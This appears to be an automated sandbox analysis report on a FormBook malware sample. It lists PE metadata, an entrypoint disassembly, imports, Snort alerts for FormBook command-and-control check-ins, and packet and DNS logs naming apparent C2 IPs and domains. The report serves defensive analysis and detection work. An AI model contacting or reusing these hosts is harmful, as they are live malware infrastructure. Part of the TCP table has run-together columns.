Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 18bc6fa81e19f21156316b1ae696ed6b

Entrypoint Preview

Instruction
sub esp, 0000017Ch
push ebx
push ebp
push esi
xor esi, esi
push edi
mov dword ptr [esp+18h], esi
mov ebp, 00409240h
mov byte ptr [esp+10h], 00000020h
call dword ptr [00407030h]
push esi
call dword ptr [00407270h]
mov dword ptr [007A3030h], eax
push esi
lea eax, dword ptr [esp+30h]
push 00000160h
push eax
push esi
push 0079E540h
call dword ptr [00407158h]
push 00409230h
push 007A2780h
call 00007FF688C03BD8h
mov ebx, 007AA400h
push ebx
push 00000400h
call dword ptr [004070B4h]
call 00007FF688C01319h
test eax, eax
jne 00007FF688C013D6h
push 000003FBh
push ebx
call dword ptr [004070B0h]
push 00409228h
push ebx
call 00007FF688C03BC3h
call 00007FF688C012F9h
test eax, eax
je 00007FF688C014F2h
mov edi, 007A9000h
push edi
call dword ptr [00407140h]
call dword ptr [004070ACh]
push eax
push edi
call 00007FF688C03B81h
push 00000000h
call dword ptr [00407108h]
cmp byte ptr [007A9000h], 00000022h
mov dword ptr [007A2F80h], eax
mov eax, edi
jne 00007FF688C013BCh
mov byte ptr [esp+10h], 00000022h
mov eax, 00000001h

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7344 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ac000 | 0x900 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x59de | 0x5a00 | False | 0.681293402778 | data | 6.5143386598 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x10f2 | 0x1200 | False | 0.430338541667 | data | 5.0554281206 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x39a034 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x3a4000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x3ac000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94574916515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x3ac190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x3ac478 | 0x100 | data | English | United States
RT_DIALOG | 0x3ac578 | 0x11c | data | English | United States
RT_DIALOG | 0x3ac698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x3ac6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x3ac710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
USER32.dll | ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/12/21-10:06:12.886360 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49709 | 34.102.136.180 | 192.168.2.3
04/12/21-10:06:24.103583 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.3 | 52.15.160.167
04/12/21-10:06:24.103583 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.3 | 52.15.160.167
04/12/21-10:06:24.103583 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49713 | 80 | 192.168.2.3 | 52.15.160.167
04/12/21-10:06:39.648039 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.3 | 213.171.195.105
04/12/21-10:06:39.648039 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.3 | 213.171.195.105
04/12/21-10:06:39.648039 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49718 | 80 | 192.168.2.3 | 213.171.195.105
04/12/21-10:06:56.074540 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.3 | 23.227.38.74
04/12/21-10:06:56.074540 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.3 | 23.227.38.74
04/12/21-10:06:56.074540 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49725 | 80 | 192.168.2.3 | 23.227.38.74
04/12/21-10:06:56.251104 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49725 | 23.227.38.74 | 192.168.2.3
04/12/21-10:07:06.602644 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49726 | 185.253.212.22 | 192.168.2.3
04/12/21-10:07:23.705914 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.3 | 184.168.131.241
04/12/21-10:07:23.705914 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.3 | 184.168.131.241
04/12/21-10:07:23.705914 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49733 | 80 | 192.168.2.3 | 184.168.131.241
04/12/21-10:07:34.592023 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49735 | 80 | 192.168.2.3 | 104.21.24.135
04/12/21-10:07:34.592023 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49735 | 80 | 192.168.2.3 | 104.21.24.135
04/12/21-10:07:34.592023 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49735 | 80 | 192.168.2.3 | 104.21.24.135
04/12/21-10:07:39.845866 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49736 | 34.102.136.180 | 192.168.2.3

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 12, 2021 10:06:12.700453043 CEST | 49709 | 80 | 192.168.2.3 | 34.102.136.180
Apr 12, 2021 10:06:12.742374897 CEST | 80 | 49709 | 34.102.136.180 | 192.168.2.3
Apr 12, 2021 10:06:12.742485046 CEST | 49709 | 80 | 192.168.2.3 | 34.102.136.180
Apr 12, 2021 10:06:12.742605925 CEST | 49709 | 80 | 192.168.2.3 | 34.102.136.180
Apr 12, 2021 10:06:12.786351919 CEST | 80 | 49709 | 34.102.136.180 | 192.168.2.3
Apr 12, 2021 10:06:12.886359930 CEST | 80 | 49709 | 34.102.136.180 | 192.168.2.3
Apr 12, 2021 10:06:12.886396885 CEST | 80 | 49709 | 34.102.136.180 | 192.168.2.3
Apr 12, 2021 10:06:12.886513948 CEST | 49709 | 80 | 192.168.2.3 | 34.102.136.180
Apr 12, 2021 10:06:12.886676073 CEST | 49709 | 80 | 192.168.2.3 | 34.102.136.180
Apr 12, 2021 10:06:12.930332899 CEST | 80 | 49709 | 34.102.136.180 | 192.168.2.3
Apr 12, 2021 10:06:17.975327015 CEST | 49711 | 80 | 192.168.2.3 | 184.168.131.241
Apr 12, 2021 10:06:18.179218054 CEST | 80 | 49711 | 184.168.131.241 | 192.168.2.3
Apr 12, 2021 10:06:18.181422949 CEST | 49711 | 80 | 192.168.2.3 | 184.168.131.241
Apr 12, 2021 10:06:18.181508064 CEST | 49711 | 80 | 192.168.2.3 | 184.168.131.241
Apr 12, 2021 10:06:18.385077000 CEST | 80 | 49711 | 184.168.131.241 | 192.168.2.3
Apr 12, 2021 10:06:18.420839071 CEST | 80 | 49711 | 184.168.131.241 | 192.168.2.3
Apr 12, 2021 10:06:18.420866966 CEST | 80 | 49711 | 184.168.131.241 | 192.168.2.3
Apr 12, 2021 10:06:18.421087027 CEST | 49711 | 80 | 192.168.2.3 | 184.168.131.241
Apr 12, 2021 10:06:18.421169043 CEST | 49711 | 80 | 192.168.2.3 | 184.168.131.241
Apr 12, 2021 10:06:18.624491930 CEST | 80 | 49711 | 184.168.131.241 | 192.168.2.3
Apr 12, 2021 10:06:23.963184118 CEST | 49713 | 80 | 192.168.2.3 | 52.15.160.167
Apr 12, 2021 10:06:24.103296995 CEST | 80 | 49713 | 52.15.160.167 | 192.168.2.3
Apr 12, 2021 10:06:24.103418112 CEST | 49713 | 80 | 192.168.2.3 | 52.15.160.167
Apr 12, 2021 10:06:24.103583097 CEST | 49713 | 80 | 192.168.2.3 | 52.15.160.167
Apr 12, 2021 10:06:24.240886927 CEST | 80 | 49713 | 52.15.160.167 | 192.168.2.3
Apr 12, 2021 10:06:24.241137028 CEST | 80 | 49713 | 52.15.160.167 | 192.168.2.3
Apr 12, 2021 10:06:24.241153955 CEST | 80 | 49713 | 52.15.160.167 | 192.168.2.3
Apr 12, 2021 10:06:24.241297960 CEST | 49713 | 80 | 192.168.2.3 | 52.15.160.167
Apr 12, 2021 10:06:24.241328001 CEST | 49713 | 80 | 192.168.2.3 | 52.15.160.167
Apr 12, 2021 10:06:24.383333921 CEST | 80 | 49713 | 52.15.160.167 | 192.168.2.3
Apr 12, 2021 10:06:39.591603041 CEST | 49718 | 80 | 192.168.2.3 | 213.171.195.105
Apr 12, 2021 10:06:39.647742033 CEST | 80 | 49718 | 213.171.195.105 | 192.168.2.3
Apr 12, 2021 10:06:39.647850037 CEST | 49718 | 80 | 192.168.2.3 | 213.171.195.105
Apr 12, 2021 10:06:39.648039103 CEST | 49718 | 80 | 192.168.2.3 | 213.171.195.105
Apr 12, 2021 10:06:39.703845978 CEST | 80 | 49718 | 213.171.195.105 | 192.168.2.3
Apr 12, 2021 10:06:39.703871965 CEST | 80 | 49718 | 213.171.195.105 | 192.168.2.3
Apr 12, 2021 10:06:39.703888893 CEST | 80 | 49718 | 213.171.195.105 | 192.168.2.3
Apr 12, 2021 10:06:39.703958988 CEST | 80 | 49718 | 213.171.195.105 | 192.168.2.3
Apr 12, 2021 10:06:39.704070091 CEST | 49718 | 80 | 192.168.2.3 | 213.171.195.105
Apr 12, 2021 10:06:39.704123974 CEST | 49718 | 80 | 192.168.2.3 | 213.171.195.105
Apr 12, 2021 10:06:39.704212904 CEST | 49718 | 80 | 192.168.2.3 | 213.171.195.105
Apr 12, 2021 10:06:45.028251886 CEST | 49721 | 80 | 192.168.2.3 | 169.1.24.244
Apr 12, 2021 10:06:45.261461020 CEST | 80 | 49721 | 169.1.24.244 | 192.168.2.3
Apr 12, 2021 10:06:45.261641979 CEST | 49721 | 80 | 192.168.2.3 | 169.1.24.244
Apr 12, 2021 10:06:45.261780977 CEST | 49721 | 80 | 192.168.2.3 | 169.1.24.244
Apr 12, 2021 10:06:45.496073008 CEST | 80 | 49721 | 169.1.24.244 | 192.168.2.3
Apr 12, 2021 10:06:45.496208906 CEST | 49721 | 80 | 192.168.2.3 | 169.1.24.244
Apr 12, 2021 10:06:45.496284008 CEST | 49721 | 80 | 192.168.2.3 | 169.1.24.244
Apr 12, 2021 10:06:45.720632076 CEST | 80 | 49721 | 169.1.24.244 | 192.168.2.3
Apr 12, 2021 10:06:50.677201033 CEST | 49723 | 80 | 192.168.2.3 | 162.209.114.201
Apr 12, 2021 10:06:50.800687075 CEST | 80 | 49723 | 162.209.114.201 | 192.168.2.3
Apr 12, 2021 10:06:50.801640987 CEST | 49723 | 80 | 192.168.2.3 | 162.209.114.201
Apr 12, 2021 10:06:50.801923037 CEST | 49723 | 80 | 192.168.2.3 | 162.209.114.201
Apr 12, 2021 10:06:50.925311089 CEST | 80 | 49723 | 162.209.114.201 | 192.168.2.3
Apr 12, 2021 10:06:50.927325964 CEST | 80 | 49723 | 162.209.114.201 | 192.168.2.3
Apr 12, 2021 10:06:50.927370071 CEST | 80 | 49723 | 162.209.114.201 | 192.168.2.3
Apr 12, 2021 10:06:50.927634954 CEST | 49723 | 80 | 192.168.2.3 | 162.209.114.201
Apr 12, 2021 10:06:50.927676916 CEST | 49723 | 80 | 192.168.2.3 | 162.209.114.201
Apr 12, 2021 10:06:51.051131964 CEST | 80 | 49723 | 162.209.114.201 | 192.168.2.3
Apr 12, 2021 10:06:56.031466961 CEST | 49725 | 80 | 192.168.2.3 | 23.227.38.74
Apr 12, 2021 10:06:56.073962927 CEST | 80 | 49725 | 23.227.38.74 | 192.168.2.3
Apr 12, 2021 10:06:56.074162960 CEST | 49725 | 80 | 192.168.2.3 | 23.227.38.74
Apr 12, 2021 10:06:56.074539900 CEST | 49725 | 80 | 192.168.2.3 | 23.227.38.74
Apr 12, 2021 10:06:56.116856098 CEST | 80 | 49725 | 23.227.38.74 | 192.168.2.3
Apr 12, 2021 10:06:56.251104116 CEST | 80 | 49725 | 23.227.38.74 | 192.168.2.3
Apr 12, 2021 10:06:56.251144886 CEST | 80 | 49725 | 23.227.38.74 | 192.168.2.3
Apr 12, 2021 10:06:56.251162052 CEST | 80 | 49725 | 23.227.38.74 | 192.168.2.3
Apr 12, 2021 10:06:56.251178026 CEST | 80 | 49725 | 23.227.38.74 | 192.168.2.3
Apr 12, 2021 10:06:56.251194000 CEST | 80 | 49725 | 23.227.38.74 | 192.168.2.3
Apr 12, 2021 10:06:56.251204967 CEST | 80 | 49725 | 23.227.38.74 | 192.168.2.3
Apr 12, 2021 10:06:56.251220942 CEST | 80 | 49725 | 23.227.38.74 | 192.168.2.3
Apr 12, 2021 10:06:56.251365900 CEST | 49725 | 80 | 192.168.2.3 | 23.227.38.74
Apr 12, 2021 10:06:56.251424074 CEST | 49725 | 80 | 192.168.2.3 | 23.227.38.74
Apr 12, 2021 10:06:56.251529932 CEST | 49725 | 80 | 192.168.2.3 | 23.227.38.74
Apr 12, 2021 10:07:06.477828026 CEST | 49726 | 80 | 192.168.2.3 | 185.253.212.22
                                                                            Apr 12, 2021 10:07:06.537234068 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:06.537369967 CEST4972680192.168.2.3185.253.212.22
                                                                            Apr 12, 2021 10:07:06.537733078 CEST4972680192.168.2.3185.253.212.22
                                                                            Apr 12, 2021 10:07:06.602602005 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:06.602643967 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:06.602660894 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:06.602829933 CEST4972680192.168.2.3185.253.212.22
                                                                            Apr 12, 2021 10:07:06.602936029 CEST4972680192.168.2.3185.253.212.22
                                                                            Apr 12, 2021 10:07:06.662379980 CEST8049726185.253.212.22192.168.2.3
                                                                            Apr 12, 2021 10:07:17.967724085 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.187750101 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:18.187925100 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.188160896 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.403793097 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:18.403820038 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:18.403829098 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:18.406378984 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.406563044 CEST4973280192.168.2.345.142.156.44
                                                                            Apr 12, 2021 10:07:18.622765064 CEST804973245.142.156.44192.168.2.3
                                                                            Apr 12, 2021 10:07:23.509421110 CEST4973380192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:07:23.705492973 CEST8049733184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:07:23.705681086 CEST4973380192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:07:23.705914021 CEST4973380192.168.2.3184.168.131.241
                                                                            Apr 12, 2021 10:07:23.901904106 CEST8049733184.168.131.241192.168.2.3
                                                                            Apr 12, 2021 10:07:23.957165956 CEST8049733184.168.131.241192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 12, 2021 10:05:20.122581005 CEST | 50200 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:05:20.171334982 CEST | 53 | 50200 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:05:22.757194042 CEST | 51281 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:05:22.820715904 CEST | 53 | 51281 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:05:27.343539000 CEST | 49199 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:05:27.392163992 CEST | 53 | 49199 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:05:29.547214031 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:05:29.596024990 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:05:32.684887886 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:05:32.736320972 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:05:53.382253885 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:05:53.450334072 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:05:58.541904926 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:05:58.590631008 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:06.595482111 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:06.644294024 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:12.612741947 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:12.694369078 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:15.645478010 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:15.694255114 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:17.895628929 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:17.974059105 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:19.354692936 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:19.413697004 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:23.741298914 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:23.935321093 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:27.774446011 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:27.826001883 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:29.279805899 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:29.378269911 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:35.918772936 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:35.982625008 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:36.155713081 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:36.227798939 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:38.703079939 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:38.754638910 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:39.501672983 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:39.590591908 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:42.907608032 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:42.956401110 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:43.847261906 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:43.896080017 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:44.767106056 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:45.027236938 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:45.253624916 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:45.313050985 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:50.511313915 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:50.675977945 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:52.377207994 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:52.426156998 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:06:55.946742058 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:06:56.030133963 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:07:01.284339905 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:07:01.374114037 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:07:06.384825945 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:07:06.476445913 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:07:10.516870975 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:07:10.594377041 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:07:11.618877888 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:07:11.728017092 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:07:12.890963078 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:07:12.939604044 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:07:14.240698099 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:07:14.289510965 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:07:16.765417099 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:07:16.814090014 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:07:17.345175982 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:07:17.966291904 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:07:23.420985937 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:07:23.506768942 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:07:28.965080976 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:07:29.043720007 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Apr 12, 2021 10:07:34.469288111 CEST | 61946 | 53 | 192.168.2.3 | 8.8.8.8
Apr 12, 2021 10:07:34.549664021 CEST | 53 | 61946 | 8.8.8.8 | 192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 12, 2021 10:06:12.612741947 CEST | 192.168.2.3 | 8.8.8.8 | 0xe041 | Standard query (0) | www.fibermover.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:17.895628929 CEST | 192.168.2.3 | 8.8.8.8 | 0xb7ac | Standard query (0) | www.mojilifenoosa.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:23.741298914 CEST | 192.168.2.3 | 8.8.8.8 | 0x8bd | Standard query (0) | www.7chd.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:29.279805899 CEST | 192.168.2.3 | 8.8.8.8 | 0x4b0 | Standard query (0) | www.bl927.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:39.501672983 CEST | 192.168.2.3 | 8.8.8.8 | 0xd579 | Standard query (0) | www.hispekdiamond.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:44.767106056 CEST | 192.168.2.3 | 8.8.8.8 | 0xaf00 | Standard query (0) | www.swashbug.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:50.511313915 CEST | 192.168.2.3 | 8.8.8.8 | 0x2d44 | Standard query (0) | www.zagorafinancial.com | A (IP address) | IN (0x0001)
